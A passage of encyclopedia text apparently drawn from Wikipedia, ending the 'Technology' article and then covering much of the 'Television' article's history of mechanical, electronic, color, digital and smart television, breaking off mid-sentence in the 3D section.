philosophers and policymakers. Because innovation is often undertaken at the edge of scientific knowledge, most technologies are not derived from scientific knowledge, but instead from engineering, tinkering and chance. For example, in the 1940s and 1950s, when knowledge of turbulent combustion or fluid dynamics was still crude, jet engines were invented through "running the device to destruction, analyzing what broke [...] and repeating the process". Scientific explanations often follow technological developments rather than preceding them. Many discoveries also arose from pure chance, like the discovery of penicillin as a result of accidental lab contamination. Since the 1960s, the assumption that government funding of basic research would lead to the discovery of marketable technologies has lost credibility. Probabilist Nassim Taleb argues that national research programs that implement the notions of serendipity and convexity through frequent trial and error are more likely to lead to useful innovations than research that aims to reach specific outcomes. Despite this, modern technology is increasingly reliant on deep, domain-specific scientific knowledge. In 1975, there was an average of one citation of scientific literature in every three patents granted in the U.S.; by 1989, this increased to an average of one citation per patent. The average was skewed upwards by patents related to the pharmaceutical industry, chemistry, and electronics. A 2021 analysis shows that patents that are based on scientific discoveries are on average 26% more valuable than equivalent non-science-based patents. Other animal species The use of basic technology is also a feature of non-human animal species. Tool use was once considered a defining characteristic of the genus Homo. This view was supplanted after discovering evidence of tool use among chimpanzees and other primates, dolphins, and crows. For example, researchers have observed wild chimpanzees using basic foraging tools, pestles, levers, using leaves as sponges, and tree bark or vines as probes to fish termites. West African chimpanzees use stone hammers and anvils for cracking nuts, as do capuchin monkeys of Boa Vista, Brazil. Tool use is not the only form of animal technology use; for example, beaver dams, built with wooden sticks or large stones, are a technology with "dramatic" impacts on river habitats and ecosystems. Popular culture The relationship of humanity with technology has been explored in science-fiction literature, for example in Brave New World, A Clockwork Orange, Nineteen Eighty-Four, Isaac Asimov's essays, and movies like Minority Report, Total Recall, Gattaca, and Inception. It has spawned the dystopian and futuristic cyberpunk genre, which juxtaposes futuristic technology with societal collapse, dystopia or decay. Notable cyberpunk works include William Gibson's Neuromancer novel, and movies like Blade Runner, and The Matrix.
Technology
null
null
29831
https://en.wikipedia.org/wiki/Television
Television
Television (TV) is a telecommunication medium for transmitting moving images and sound. Additionally, the term can refer to a physical television set rather than the medium of transmission. Television is a mass medium for advertising, entertainment, news, and sports. The medium is capable of more than "radio broadcasting," which refers to an audio signal sent to radio receivers. Television became available in crude experimental forms in the 1920s, but only after several years of further development was the new technology marketed to consumers. After World War II, an improved form of black-and-white television broadcasting became popular in the United Kingdom and the United States, and television sets became commonplace in homes, businesses, and institutions. During the 1950s, television was the primary medium for influencing public opinion. In the mid-1960s, color broadcasting was introduced in the U.S. and most other developed countries. The availability of various types of archival storage media such as Betamax and VHS tapes, LaserDiscs, high-capacity hard disk drives, CDs, DVDs, flash drives, high-definition HD DVDs and Blu-ray Discs, and cloud digital video recorders has enabled viewers to watch pre-recorded material—such as movies—at home on their own time schedule. For many reasons, especially the convenience of remote retrieval, the storage of television and video programming now also occurs on the cloud (such as the video-on-demand service by Netflix). At the beginning of the 2010s, digital television transmissions greatly increased in popularity. Another development was the move from standard-definition television (SDTV) (576i, with 576 interlaced lines of resolution and 480i) to high-definition television (HDTV), which provides a resolution that is substantially higher. HDTV may be transmitted in different formats: 1080p, 1080i and 720p. Since 2010, with the invention of smart television, Internet television has increased the availability of television programs and movies via the Internet through streaming video services such as Netflix, Amazon Prime Video, iPlayer and Hulu. In 2013, 79% of the world's households owned a television set. The replacement of earlier cathode-ray tube (CRT) screen displays with compact, energy-efficient, flat-panel alternative technologies such as LCDs (both fluorescent-backlit and LED), OLED displays, and plasma displays was a hardware revolution that began with computer monitors in the late 1990s. Most television sets sold in the 2000s were still CRT, it was only in early 2010s that flat-screen TVs decisively overtook CRT. Major manufacturers announced the discontinuation of CRT, Digital Light Processing (DLP), plasma, and even fluorescent-backlit LCDs by the mid-2010s. LEDs are being gradually replaced by OLEDs. Also, major manufacturers have started increasingly producing smart TVs in the mid-2010s. Smart TVs with integrated Internet and Web 2.0 functions became the dominant form of television by the late 2010s. Television signals were initially distributed only as terrestrial television using high-powered radio-frequency television transmitters to broadcast the signal to individual television receivers. Alternatively, television signals are distributed by coaxial cable or optical fiber, satellite systems, and, since the 2000s, via the Internet. Until the early 2000s, these were transmitted as analog signals, but a transition to digital television was expected to be completed worldwide by the late 2010s. A standard television set consists of multiple internal electronic circuits, including a tuner for receiving and decoding broadcast signals. A visual display device that lacks a tuner is correctly called a video monitor rather than a television. The television broadcasts are mainly a simplex broadcast meaning that the transmitter cannot receive and the receiver cannot transmit. Etymology The word television comes . The first documented usage of the term dates back to 1900, when the Russian scientist Constantin Perskyi used it in a paper that he presented in French at the first International Congress of Electricity, which ran from 18 to 25 August 1900 during the International World Fair in Paris. The anglicized version of the term is first attested in 1907, when it was still "...a theoretical system to transmit moving images over telegraph or telephone wires". It was "...formed in English or borrowed from French ." In the 19th century and early 20th century, other "...proposals for the name of a then-hypothetical technology for sending pictures over distance were telephote (1880) and televista (1904)." The abbreviation TV is from 1948. The use of the term to mean "a television set" dates from 1941. The use of the term to mean "television as a medium" dates from 1927. The term telly is more common in the UK. The slang term "the tube" or the "boob tube" derives from the bulky cathode-ray tube used on most TVs until the advent of flat-screen TVs. Another slang term for the TV is "idiot box." History Mechanical Facsimile transmission systems for still photographs pioneered methods of mechanical scanning of images in the early 19th century. Alexander Bain introduced the facsimile machine between 1843 and 1846. Frederick Bakewell demonstrated a working laboratory version in 1851. Willoughby Smith discovered the photoconductivity of the element selenium in 1873. As a 23-year-old German university student, Paul Julius Gottlieb Nipkow proposed and patented the Nipkow disk in 1884 in Berlin. This was a spinning disk with a spiral pattern of holes, so each hole scanned a line of the image. Although he never built a working model of the system, variations of Nipkow's spinning-disk "image rasterizer" became exceedingly common. Constantin Perskyi had coined the word television in a paper read to the International Electricity Congress at the International World Fair in Paris on 24 August 1900. Perskyi's paper reviewed the existing electromechanical technologies, mentioning the work of Nipkow and others. However, it was not until 1907 that developments in amplification tube technology by Lee de Forest and Arthur Korn, among others, made the design practical. The first demonstration of the live transmission of images was by Georges Rignoux and A. Fournier in Paris in 1909. A matrix of 64 selenium cells, individually wired to a mechanical commutator, served as an electronic retina. In the receiver, a type of Kerr cell modulated the light, and a series of differently angled mirrors attached to the edge of a rotating disc scanned the modulated beam onto the display screen. A separate circuit regulated synchronization. The 8x8 pixel resolution in this proof-of-concept demonstration was just sufficient to clearly transmit individual letters of the alphabet. An updated image was transmitted "several times" each second. In 1911, Boris Rosing and his student Vladimir Zworykin created a system that used a mechanical mirror-drum scanner to transmit, in Zworykin's words, "very crude images" over wires to the "Braun tube" (cathode-ray tube or "CRT") in the receiver. Moving images were not possible because, in the scanner: "the sensitivity was not enough and the selenium cell was very laggy". In 1921, Édouard Belin sent the first image via radio waves with his belinograph. By the 1920s, when amplification made television practical, Scottish inventor John Logie Baird employed the Nipkow disk in his prototype video systems. On 25 March 1925, Baird gave the first public demonstration of televised silhouette images in motion at Selfridges's department store in London. Since human faces had inadequate contrast to show up on his primitive system, he televised a ventriloquist's dummy named "Stooky Bill," whose painted face had higher contrast, talking and moving. By 26 January 1926, he had demonstrated before members of the Royal Institution the transmission of an image of a face in motion by radio. This is widely regarded as the world's first true public television demonstration, exhibiting light, shade, and detail. Baird's system used the Nipkow disk for both scanning the image and displaying it. A brightly illuminated subject was placed in front of a spinning Nipkow disk set with lenses that swept images across a static photocell. The thallium sulfide (Thalofide) cell, developed by Theodore Case in the U.S., detected the light reflected from the subject and converted it into a proportional electrical signal. This was transmitted by AM radio waves to a receiver unit, where the video signal was applied to a neon light behind a second Nipkow disk rotating synchronized with the first. The brightness of the neon lamp was varied in proportion to the brightness of each spot on the image. As each hole in the disk passed by, one scan line of the image was reproduced. Baird's disk had 30 holes, producing an image with only 30 scan lines, just enough to recognize a human face. In 1927, Baird transmitted a signal over of telephone line between London and Glasgow. Baird's original 'televisor' now resides in the Science Museum, South Kensington. In 1928, Baird's company (Baird Television Development Company/Cinema Television) broadcast the first transatlantic television signal between London and New York and the first shore-to-ship transmission. In 1929, he became involved in the first experimental mechanical television service in Germany. In November of the same year, Baird and Bernard Natan of Pathé established France's first television company, Télévision-Baird-Natan. In 1931, he made the first outdoor remote broadcast of The Derby. In 1932, he demonstrated ultra-short wave television. Baird's mechanical system reached a peak of 240 lines of resolution on BBC telecasts in 1936, though the mechanical system did not scan the televised scene directly. Instead, a 17.5 mm film was shot, rapidly developed, and then scanned while the film was still wet. A U.S. inventor, Charles Francis Jenkins, also pioneered the television. He published an article on "Motion Pictures by Wireless" in 1913, transmitted moving silhouette images for witnesses in December 1923, and on 13 June 1925, publicly demonstrated synchronized transmission of silhouette pictures. In 1925, Jenkins used the Nipkow disk and transmitted the silhouette image of a toy windmill in motion over a distance of 5 miles (8 km), from a naval radio station in Maryland to his laboratory in Washington, D.C., using a lensed disk scanner with a 48-line resolution. He was granted U.S. Patent No. 1,544,156 (Transmitting Pictures over Wireless) on 30 June 1925 (filed 13 March 1922). Herbert E. Ives and Frank Gray of Bell Telephone Laboratories gave a dramatic demonstration of mechanical television on 7 April 1927. Their reflected-light television system included both small and large viewing screens. The small receiver had a 2-inch-wide by 2.5-inch-high screen (5 by 6 cm). The large receiver had a screen 24 inches wide by 30 inches high (60 by 75 cm). Both sets could reproduce reasonably accurate, monochromatic, moving images. Along with the pictures, the sets received synchronized sound. The system transmitted images over two paths: first, a copper wire link from Washington to New York City, then a radio link from Whippany, New Jersey. Comparing the two transmission methods, viewers noted no difference in quality. Subjects of the telecast included Secretary of Commerce Herbert Hoover. A flying-spot scanner beam illuminated these subjects. The scanner that produced the beam had a 50-aperture disk. The disc revolved at a rate of 18 frames per second, capturing one frame about every 56 milliseconds. (Today's systems typically transmit 30 or 60 frames per second, or one frame every 33.3 or 16.7 milliseconds, respectively.) Television historian Albert Abramson underscored the significance of the Bell Labs demonstration: "It was, in fact, the best demonstration of a mechanical television system ever made to this time. It would be several years before any other system could even begin to compare with it in picture quality." In 1928, WRGB, then W2XB, was started as the world's first television station. It broadcast from the General Electric facility in Schenectady, NY. It was popularly known as "WGY Television." Meanwhile, in the Soviet Union, Leon Theremin had been developing a mirror drum-based television, starting with 16 lines resolution in 1925, then 32 lines, and eventually 64 using interlacing in 1926. As part of his thesis, on 7 May 1926, he electrically transmitted and then projected near-simultaneous moving images on a screen. By 1927 Theremin had achieved an image of 100 lines, a resolution that was not surpassed until May 1932 by RCA, with 120 lines. On 25 December 1926, Kenjiro Takayanagi demonstrated a television system with a 40-line resolution that employed a Nipkow disk scanner and CRT display at Hamamatsu Industrial High School in Japan. This prototype is still on display at the Takayanagi Memorial Museum in Shizuoka University, Hamamatsu Campus. His research in creating a production model was halted by the SCAP after World War II. Because only a limited number of holes could be made in the disks, and disks beyond a certain diameter became impractical, image resolution on mechanical television broadcasts was relatively low, ranging from about 30 lines up to 120 or so. Nevertheless, the image quality of 30-line transmissions steadily improved with technical advances, and by 1933 the UK broadcasts using the Baird system were remarkably clear. A few systems ranging into the 200-line region also went on the air. Two of these were the 180-line system that Compagnie des Compteurs (CDC) installed in Paris in 1935 and the 180-line system that Peck Television Corp. started in 1935 at station VE9AK in Montreal. The advancement of all-electronic television (including image dissectors and other camera tubes and cathode-ray tubes for the reproducer) marked the start of the end for mechanical systems as the dominant form of television. Mechanical television, despite its inferior image quality and generally smaller picture, would remain the primary television technology until the 1930s. The last mechanical telecasts ended in 1939 at stations run by a lot of public universities in the United States. Electronic In 1897, English physicist J. J. Thomson was able, in his three well-known experiments, to deflect cathode rays, a fundamental function of the modern cathode-ray tube (CRT). The earliest version of the CRT was invented by the German physicist Ferdinand Braun in 1897 and is also known as the "Braun" tube. It was a cold-cathode diode, a modification of the Crookes tube, with a phosphor-coated screen. Braun was the first to conceive the use of a CRT as a display device. The Braun tube became the foundation of 20th century television. In 1906 the Germans Max Dieckmann and Gustav Glage produced raster images for the first time in a CRT. In 1907, Russian scientist Boris Rosing used a CRT in the receiving end of an experimental video signal to form a picture. He managed to display simple geometric shapes onto the screen. In 1908, Alan Archibald Campbell-Swinton, a fellow of the Royal Society (UK), published a letter in the scientific journal Nature in which he described how "distant electric vision" could be achieved by using a cathode-ray tube, or Braun tube, as both a transmitting and receiving device, he expanded on his vision in a speech given in London in 1911 and reported in The Times and the Journal of the Röntgen Society. In a letter to Nature published in October 1926, Campbell-Swinton also announced the results of some "not very successful experiments" he had conducted with G. M. Minchin and J. C. M. Stanton. They had attempted to generate an electrical signal by projecting an image onto a selenium-coated metal plate that was simultaneously scanned by a cathode ray beam. These experiments were conducted before March 1914, when Minchin died, but they were later repeated by two different teams in 1937, by H. Miller and J. W. Strange from EMI, and by H. Iams and A. Rose from RCA. Both teams successfully transmitted "very faint" images with the original Campbell-Swinton's selenium-coated plate. Although others had experimented with using a cathode-ray tube as a receiver, the concept of using one as a transmitter was novel. The first cathode-ray tube to use a hot cathode was developed by John B. Johnson (who gave his name to the term Johnson noise) and Harry Weiner Weinhart of Western Electric, and became a commercial product in 1922. In 1926, Hungarian engineer Kálmán Tihanyi designed a television system using fully electronic scanning and display elements and employing the principle of "charge storage" within the scanning (or "camera") tube. The problem of low sensitivity to light resulting in low electrical output from transmitting or "camera" tubes would be solved with the introduction of charge-storage technology by Kálmán Tihanyi beginning in 1924. His solution was a camera tube that accumulated and stored electrical charges ("photoelectrons") within the tube throughout each scanning cycle. The device was first described in a patent application he filed in Hungary in March 1926 for a television system he called "Radioskop". After further refinements included in a 1928 patent application, Tihanyi's patent was declared void in Great Britain in 1930, so he applied for patents in the United States. Although his breakthrough would be incorporated into the design of RCA's "iconoscope" in 1931, the U.S. patent for Tihanyi's transmitting tube would not be granted until May 1939. The patent for his receiving tube had been granted the previous October. Both patents had been purchased by RCA prior to their approval. Charge storage remains a basic principle in the design of imaging devices for television to the present day. On 25 December 1926, at Hamamatsu Industrial High School in Japan, Japanese inventor Kenjiro Takayanagi demonstrated a TV system with a 40-line resolution that employed a CRT display. This was the first working example of a fully electronic television receiver and Takayanagi's team later made improvements to this system parallel to other television developments. Takayanagi did not apply for a patent. In the 1930s, Allen B. DuMont made the first CRTs to last 1,000 hours of use, one of the factors that led to the widespread adoption of television. On 7 September 1927, U.S. inventor Philo Farnsworth's image dissector camera tube transmitted its first image, a simple straight line, at his laboratory at 202 Green Street in San Francisco. By 3 September 1928, Farnsworth had developed the system sufficiently to hold a demonstration for the press. This is widely regarded as the first electronic television demonstration. In 1929, the system was improved further by eliminating a motor generator so that his television system had no mechanical parts. That year, Farnsworth transmitted the first live human images with his system, including a three and a half-inch image of his wife Elma ("Pem") with her eyes closed (possibly due to the bright lighting required). Meanwhile, Vladimir Zworykin also experimented with the cathode-ray tube to create and show images. While working for Westinghouse Electric in 1923, he began to develop an electronic camera tube. However, in a 1925 demonstration, the image was dim, had low contrast and poor definition, and was stationary. Zworykin's imaging tube never got beyond the laboratory stage. However, RCA, which acquired the Westinghouse patent, asserted that the patent for Farnsworth's 1927 image dissector was written so broadly that it would exclude any other electronic imaging device. Thus, based on Zworykin's 1923 patent application, RCA filed a patent interference suit against Farnsworth. The U.S. Patent Office examiner disagreed in a 1935 decision, finding priority of invention for Farnsworth against Zworykin. Farnsworth claimed that Zworykin's 1923 system could not produce an electrical image of the type to challenge his patent. Zworykin received a patent in 1928 for a color transmission version of his 1923 patent application. He also divided his original application in 1931. Zworykin was unable or unwilling to introduce evidence of a working model of his tube that was based on his 1923 patent application. In September 1939, after losing an appeal in the courts and being determined to go forward with the commercial manufacturing of television equipment, RCA agreed to pay Farnsworth US$1 million over ten years, in addition to license payments, to use his patents. In 1933, RCA introduced an improved camera tube that relied on Tihanyi's charge storage principle. Called the "Iconoscope" by Zworykin, the new tube had a light sensitivity of about 75,000 lux, and thus was claimed to be much more sensitive than Farnsworth's image dissector. However, Farnsworth had overcome his power issues with his Image Dissector through the invention of a completely unique "Multipactor" device that he began work on in 1930, and demonstrated in 1931. This small tube could amplify a signal reportedly to the 60th power or better and showed great promise in all fields of electronics. Unfortunately, an issue with the multipactor was that it wore out at an unsatisfactory rate. At the Berlin Radio Show in August 1931 in Berlin, Manfred von Ardenne gave a public demonstration of a television system using a CRT for both transmission and reception, the first completely electronic television transmission. However, Ardenne had not developed a camera tube, using the CRT instead as a flying-spot scanner to scan slides and film. Ardenne achieved his first transmission of television pictures on 24 December 1933, followed by test runs for a public television service in 1934. The world's first electronically scanned television service then started in Berlin in 1935, the Fernsehsender Paul Nipkow, culminating in the live broadcast of the 1936 Summer Olympic Games from Berlin to public places all over Germany. Philo Farnsworth gave the world's first public demonstration of an all-electronic television system, using a live camera, at the Franklin Institute of Philadelphia on 25 August 1934 and for ten days afterward. Mexican inventor Guillermo González Camarena also played an important role in early television. His experiments with television (known as telectroescopía at first) began in 1931 and led to a patent for the "trichromatic field sequential system" color television in 1940. In Britain, the EMI engineering team led by Isaac Shoenberg applied in 1932 for a patent for a new device they called "the Emitron", which formed the heart of the cameras they designed for the BBC. On 2 November 1936, a 405-line broadcasting service employing the Emitron began at studios in Alexandra Palace and transmitted from a specially built mast atop one of the Victorian building's towers. It alternated briefly with Baird's mechanical system in adjoining studios but was more reliable and visibly superior. This was the world's first regular "high-definition" television service. The original U.S. iconoscope was noisy, had a high ratio of interference to signal, and ultimately gave disappointing results, especially compared to the high-definition mechanical scanning systems that became available. The EMI team, under the supervision of Isaac Shoenberg, analyzed how the iconoscope (or Emitron) produced an electronic signal and concluded that its real efficiency was only about 5% of the theoretical maximum. They solved this problem by developing and patenting in 1934 two new camera tubes dubbed super-Emitron and CPS Emitron. The super-Emitron was between ten and fifteen times more sensitive than the original Emitron and iconoscope tubes, and, in some cases, this ratio was considerably greater. It was used for outside broadcasting by the BBC, for the first time, on Armistice Day 1937, when the general public could watch on a television set as the King laid a wreath at the Cenotaph. This was the first time that anyone had broadcast a live street scene from cameras installed on the roof of neighboring buildings because neither Farnsworth nor RCA would do the same until the 1939 New York World's Fair. On the other hand, in 1934, Zworykin shared some patent rights with the German licensee company Telefunken. The "image iconoscope" ("Superikonoskop" in Germany) was produced as a result of the collaboration. This tube is essentially identical to the super-Emitron. The production and commercialization of the super-Emitron and image iconoscope in Europe were not affected by the patent war between Zworykin and Farnsworth because Dieckmann and Hell had priority in Germany for the invention of the image dissector, having submitted a patent application for their Lichtelektrische Bildzerlegerröhre für Fernseher (Photoelectric Image Dissector Tube for Television) in Germany in 1925, two years before Farnsworth did the same in the United States. The image iconoscope (Superikonoskop) became the industrial standard for public broadcasting in Europe from 1936 until 1960, when it was replaced by the vidicon and plumbicon tubes. Indeed, it represented the European tradition in electronic tubes competing against the American tradition represented by the image orthicon. The German company Heimann produced the Superikonoskop for the 1936 Berlin Olympic Games, later Heimann also produced and commercialized it from 1940 to 1955; finally the Dutch company Philips produced and commercialized the image iconoscope and multicon from 1952 to 1958. U.S. television broadcasting, at the time, consisted of a variety of markets in a wide range of sizes, each competing for programming and dominance with separate technology until deals were made and standards agreed upon in 1941. RCA, for example, used only Iconoscopes in the New York area, but Farnsworth Image Dissectors in Philadelphia and San Francisco. In September 1939, RCA agreed to pay the Farnsworth Television and Radio Corporation royalties over the next ten years for access to Farnsworth's patents. With this historic agreement in place, RCA integrated much of what was best about the Farnsworth Technology into their systems. In 1941, the United States implemented 525-line television. Electrical engineer Benjamin Adler played a prominent role in the development of television. The world's first 625-line television standard was designed in the Soviet Union in 1944 and became a national standard in 1946. The first broadcast in 625-line standard occurred in Moscow in 1948. The concept of 625 lines per frame was subsequently implemented in the European CCIR standard. In 1936, Kálmán Tihanyi described the principle of plasma display, the first flat-panel display system. Early electronic television sets were large and bulky, with analog circuits made of vacuum tubes. Following the invention of the first working transistor at Bell Labs, Sony founder Masaru Ibuka predicted in 1952 that the transition to electronic circuits made of transistors would lead to smaller and more portable television sets. The first fully transistorized, portable solid-state television set was the 8-inch Sony TV8-301, developed in 1959 and released in 1960. This began the transformation of television viewership from a communal viewing experience to a solitary viewing experience. By 1960, Sony had sold over 4million portable television sets worldwide. Color The basic idea of using three monochrome images to produce a color image had been experimented with almost as soon as black-and-white televisions had first been built. Although he gave no practical details, among the earliest published proposals for television was one by Maurice Le Blanc in 1880 for a color system, including the first mentions in television literature of line and frame scanning. Polish inventor Jan Szczepanik patented a color television system in 1897, using a selenium photoelectric cell at the transmitter and an electromagnet controlling an oscillating mirror and a moving prism at the receiver. But his system contained no means of analyzing the spectrum of colors at the transmitting end and could not have worked as he described it. Another inventor, Hovannes Adamian, also experimented with color television as early as 1907. The first color television project is claimed by him, and was patented in Germany on 31 March 1908, patent No. 197183, then in Britain, on 1 April 1908, patent No. 7219, in France (patent No. 390326) and in Russia in 1910 (patent No. 17912). Scottish inventor John Logie Baird demonstrated the world's first color transmission on 3 July 1928, using scanning discs at the transmitting and receiving ends with three spirals of apertures, each spiral with filters of a different primary color, and three light sources at the receiving end, with a commutator to alternate their illumination. Baird also made the world's first color broadcast on 4 February 1938, sending a mechanically scanned 120-line image from Baird's Crystal Palace studios to a projection screen at London's Dominion Theatre. Mechanically scanned color television was also demonstrated by Bell Laboratories in June 1929 using three complete systems of photoelectric cells, amplifiers, glow-tubes, and color filters, with a series of mirrors to superimpose the red, green, and blue images into one full-color image. The first practical hybrid system was again pioneered by John Logie Baird. In 1940 he publicly demonstrated a color television combining a traditional black-and-white display with a rotating colored disk. This device was very "deep" but was later improved with a mirror folding the light path into an entirely practical device resembling a large conventional console. However, Baird was unhappy with the design, and, as early as 1944, had commented to a British government committee that a fully electronic device would be better. In 1939, Hungarian engineer Peter Carl Goldmark introduced an electro-mechanical system while at CBS, which contained an Iconoscope sensor. The CBS field-sequential color system was partly mechanical, with a disc made of red, blue, and green filters spinning inside the television camera at 1,200 rpm and a similar disc spinning in synchronization in front of the cathode-ray tube inside the receiver set. The system was first demonstrated to the Federal Communications Commission (FCC) on 29 August 1940 and shown to the press on 4 September. CBS began experimental color field tests using film as early as 28 August 1940 and live cameras by 12 November. NBC (owned by RCA) made its first field test of color television on 20 February 1941. CBS began daily color field tests on 1 June 1941. These color systems were not compatible with existing black-and-white television sets, and, as no color television sets were available to the public at this time, viewing of the color field tests was restricted to RCA and CBS engineers and the invited press. The War Production Board halted the manufacture of television and radio equipment for civilian use from 22 April 1942 to 20 August 1945, limiting any opportunity to introduce color television to the general public. As early as 1940, Baird had started work on a fully electronic system he called Telechrome. Early Telechrome devices used two electron guns aimed at either side of a phosphor plate. The phosphor was patterned so the electrons from the guns only fell on one side of the patterning or the other. Using cyan and magenta phosphors, a reasonable limited-color image could be obtained. He also demonstrated the same system using monochrome signals to produce a 3D image (called "stereoscopic" at the time). A demonstration on 16 August 1944 was the first example of a practical color television system. Work on the Telechrome continued, and plans were made to introduce a three-gun version for full color. However, Baird's untimely death in 1946 ended the development of the Telechrome system. Similar concepts were common through the 1940s and 1950s, differing primarily in the way they re-combined the colors generated by the three guns. The Geer tube was similar to Baird's concept but used small pyramids with the phosphors deposited on their outside faces instead of Baird's 3D patterning on a flat surface. The Penetron used three layers of phosphor on top of each other and increased the power of the beam to reach the upper layers when drawing those colors. The Chromatron used a set of focusing wires to select the colored phosphors arranged in vertical stripes on the tube. One of the great technical challenges of introducing color broadcast television was the desire to conserve bandwidth, potentially three times that of the existing black-and-white standards, and not use an excessive amount of radio spectrum. In the United States, after considerable research, the National Television Systems Committee approved an all-electronic system developed by RCA, which encoded the color information separately from the brightness information and significantly reduced the resolution of the color information to conserve bandwidth. As black-and-white televisions could receive the same transmission and display it in black-and-white, the color system adopted is [backwards] "compatible." ("Compatible Color," featured in RCA advertisements of the period, is mentioned in the song "America," of West Side Story, 1957.) The brightness image remained compatible with existing black-and-white television sets at slightly reduced resolution. In contrast, color televisions could decode the extra information in the signal and produce a limited-resolution color display. The higher-resolution black-and-white and lower-resolution color images combine in the brain to produce a seemingly high-resolution color image. The NTSC standard represented a significant technical achievement. The first color broadcast (the first episode of the live program The Marriage) occurred on 8 July 1954. However, during the following ten years, most network broadcasts and nearly all local programming continued to be black-and-white. It was not until the mid-1960s that color sets started selling in large numbers, due in part to the color transition of 1965, in which it was announced that over half of all network prime-time programming would be broadcast in color that fall. The first all-color prime-time season came just one year later. In 1972, the last holdout among daytime network programs converted to color, resulting in the first completely all-color network season. Early color sets were either floor-standing console models or tabletop versions nearly as bulky and heavy, so in practice they remained firmly anchored in one place. GE's relatively compact and lightweight Porta-Color set was introduced in the spring of 1966. It used a transistor-based UHF tuner. The first fully transistorized color television in the United States was the Quasar television introduced in 1967. These developments made watching color television a more flexible and convenient proposition. In 1972, sales of color sets finally surpassed sales of black-and-white sets. Color broadcasting in Europe was not standardized on the PAL format until the 1960s, and broadcasts did not start until 1967. By this point, many of the technical issues in the early sets had been worked out, and the spread of color sets in Europe was fairly rapid. By the mid-1970s, the only stations broadcasting in black-and-white were a few high-numbered UHF stations in small markets and a handful of low-power repeater stations in even smaller markets such as vacation spots. By 1979, even the last of these had converted to color. By the early 1980s, B&W sets had been pushed into niche markets, notably low-power uses, small portable sets, or for use as video monitor screens in lower-cost consumer equipment. By the late 1980s, even these last holdout niche B&W environments had inevitably shifted to color sets. Digital Digital television (DTV) is the transmission of audio and video by digitally processed and multiplexed signals, in contrast to the analog and channel-separated signals used by analog television. Due to data compression, digital television can support more than one program in the same channel bandwidth. It is an innovative service that represents the most significant evolution in television broadcast technology since color television emerged in the 1950s. Digital television's roots have been tied very closely to the availability of inexpensive, high performance computers. It was not until the 1990s that digital television became possible. Digital television was previously not practically possible due to the impractically high bandwidth requirements of uncompressed digital video, requiring around 200Mbit/s for a standard-definition television (SDTV) signal, and over 1Gbit/s for high-definition television (HDTV). A digital television service was proposed in 1986 by Nippon Telegraph and Telephone (NTT) and the Ministry of Posts and Telecommunication (MPT) in Japan, where there were plans to develop an "Integrated Network System" service. However, it was not possible to implement such a digital television service practically until the adoption of DCT video compression technology made it possible in the early 1990s. In the mid-1980s, as Japanese consumer electronics firms forged ahead with the development of HDTV technology, the MUSE analog format proposed by NHK, a Japanese company, was seen as a pacesetter that threatened to eclipse U.S. electronics companies' technologies. Until June 1990, the Japanese MUSE standard, based on an analog system, was the front-runner among the more than 23 other technical concepts under consideration. Then, a U.S. company, General Instrument, demonstrated the possibility of a digital television signal. This breakthrough was of such significance that the FCC was persuaded to delay its decision on an ATV standard until a digitally-based standard could be developed. In March 1990, when it became clear that a digital standard was possible, the FCC made several critical decisions. First, the Commission declared that the new ATV standard must be more than an enhanced analog signal but be able to provide a genuine HDTV signal with at least twice the resolution of existing television images. (7) Then, to ensure that viewers who did not wish to buy a new digital television set could continue to receive conventional television broadcasts, it dictated that the new ATV standard must be capable of being "simulcast" on different channels. (8) The new ATV standard also allowed the new DTV signal to be based on entirely new design principles. Although incompatible with the existing NTSC standard, the new DTV standard would be able to incorporate many improvements. The last standards adopted by the FCC did not require a single standard for scanning formats, aspect ratios, or lines of resolution. This compromise resulted from a dispute between the consumer electronics industry (joined by some broadcasters) and the computer industry (joined by the film industry and some public interest groups) over which of the two scanning processes—interlaced or progressive—would be best suited for the newer digital HDTV compatible display devices. Interlaced scanning, which had been specifically designed for older analog CRT display technologies, scans even-numbered lines first, then odd-numbered ones. Interlaced scanning can be regarded as the first video compression model. It was partly developed in the 1940s to double the image resolution to exceed the limitations of television broadcast bandwidth. Another reason for its adoption was to limit the flickering on early CRT screens, whose phosphor-coated screens could only retain the image from the electron scanning gun for a relatively short duration. However, interlaced scanning does not work as efficiently on newer display devices such as Liquid-crystal (LCD), for example, which are better suited to a more frequent progressive refresh rate. Progressive scanning, the format that the computer industry had long adopted for computer display monitors, scans every line in sequence, from top to bottom. Progressive scanning, in effect, doubles the amount of data generated for every full screen displayed in comparison to interlaced scanning by painting the screen in one pass in 1/60-second instead of two passes in 1/30-second. The computer industry argued that progressive scanning is superior because it does not "flicker" on the new standard of display devices in the manner of interlaced scanning. It also argued that progressive scanning enables easier connections with the Internet and is more cheaply converted to interlaced formats than vice versa. The film industry also supported progressive scanning because it offered a more efficient means of converting filmed programming into digital formats. For their part, the consumer electronics industry and broadcasters argued that interlaced scanning was the only technology that could transmit the highest quality pictures then (and currently) feasible, i.e., 1,080 lines per picture and 1,920 pixels per line. Broadcasters also favored interlaced scanning because their vast archive of interlaced programming is not readily compatible with a progressive format. William F. Schreiber, who was director of the Advanced Television Research Program at the Massachusetts Institute of Technology from 1983 until his retirement in 1990, thought that the continued advocacy of interlaced equipment originated from consumer electronics companies that were trying to get back the substantial investments they made in the interlaced technology. Digital television transition started in late 2000s. All governments across the world set the deadline for analog shutdown by the 2010s. Initially, the adoption rate was low, as the first digital tuner-equipped television sets were costly. However, as the price of digital-capable television sets dropped, more and more households started converting to digital television sets. The transition is expected to be completed worldwide by the mid to late 2010s. Smart television The advent of digital television allowed innovations like smart television sets. A smart television sometimes referred to as a "connected TV" or "hybrid TV," is a television set or set-top box with integrated Internet and Web 2.0 features and is an example of technological convergence between computers, television sets, and set-top boxes. Besides the traditional functions of television sets and set-top boxes provided through traditional Broadcasting media, these devices can also provide Internet TV, online interactive media, over-the-top content, as well as on-demand streaming media, and home networking access. These TVs come pre-loaded with an operating system. Smart TV is not to be confused with Internet TV, Internet Protocol television (IPTV), or with Web TV. Internet television refers to receiving television content over the Internet instead of through traditional systems—terrestrial, cable, and satellite. IPTV is one of the emerging Internet television technology standards for television networks. Web television (WebTV) is a term used for programs created by a wide variety of companies and individuals for broadcast on Internet TV. A first patent was filed in 1994 (and extended the following year) for an "intelligent" television system, linked with data processing systems, using a digital or analog network. Apart from being linked to data networks, one key point is its ability to automatically download necessary software routines according to a user's demand and process their needs. Major TV manufacturers announced the production of smart TVs only for middle-end and high-end TVs in 2015. Smart TVs have gotten more affordable compared to when they were first introduced, with 46 million U.S. households having at least one as of 2019. 3D 3D television conveys depth perception to the viewer by employing techniques such as stereoscopic display, multi-view display, 2D-plus-depth, or any other form of 3D display. Most modern 3D television sets use an active shutter 3D system or a 